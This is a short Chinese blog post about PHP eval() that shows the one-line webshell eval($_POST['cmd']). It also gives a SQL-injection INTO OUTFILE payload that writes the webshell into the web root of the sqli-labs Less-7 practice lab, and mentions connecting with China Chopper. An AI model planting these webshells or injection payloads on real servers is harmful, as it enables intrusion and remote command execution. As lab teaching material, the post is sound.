码迷,mamicode.com
首页 > Web开发 > 详细

PHP 一句话木马

时间:2018-12-17 21:34:25      阅读:2271      评论:0      收藏:0      [点我收藏+]

标签:space   特殊用法   post   字符串   服务   bubuko   简单   没有   sqli   

eval 函数

eval() 函数把字符串按照 PHP 代码来计算
该字符串必须是合法的 PHP 代码,且必须以分号结尾
如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false

eval 函数的一般用法

eval() 函数用于简单的文本合并
<?php
$string=‘cup‘;
$name=‘coffee‘;
$str=‘This is a $string with my $name in it.‘;
echo $str."\n";
eval("\$str=\"$str\";");
echo $str."\n";
?>

以上例程会输出

技术分享图片

eval() 函数的特殊用法

用于构造一句话木马

eval($_GET["cmd"]);

两种方式

通过数据库写马

环境:sql_labs Less-7

写入一句话木马

union select 1,2,‘<?php eval($_POST["cmd"]);?>‘ into outfile ‘d:/wampserver/wamp64/www/sqli/sqli/Less-7/twx.txt‘%23 

使用中国菜刀进行连接

技术分享图片

可以访问并操作服务器文件

技术分享图片

通过PHP 文件写马

<?php
eval($_GET["cmd"]);
?>

访问PHP 文件,查看phpinfo()

技术分享图片

 

 

 

PHP 一句话木马

标签:space   特殊用法   post   字符串   服务   bubuko   简单   没有   sqli   

原文地址:https://www.cnblogs.com/TWX521/p/10133136.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!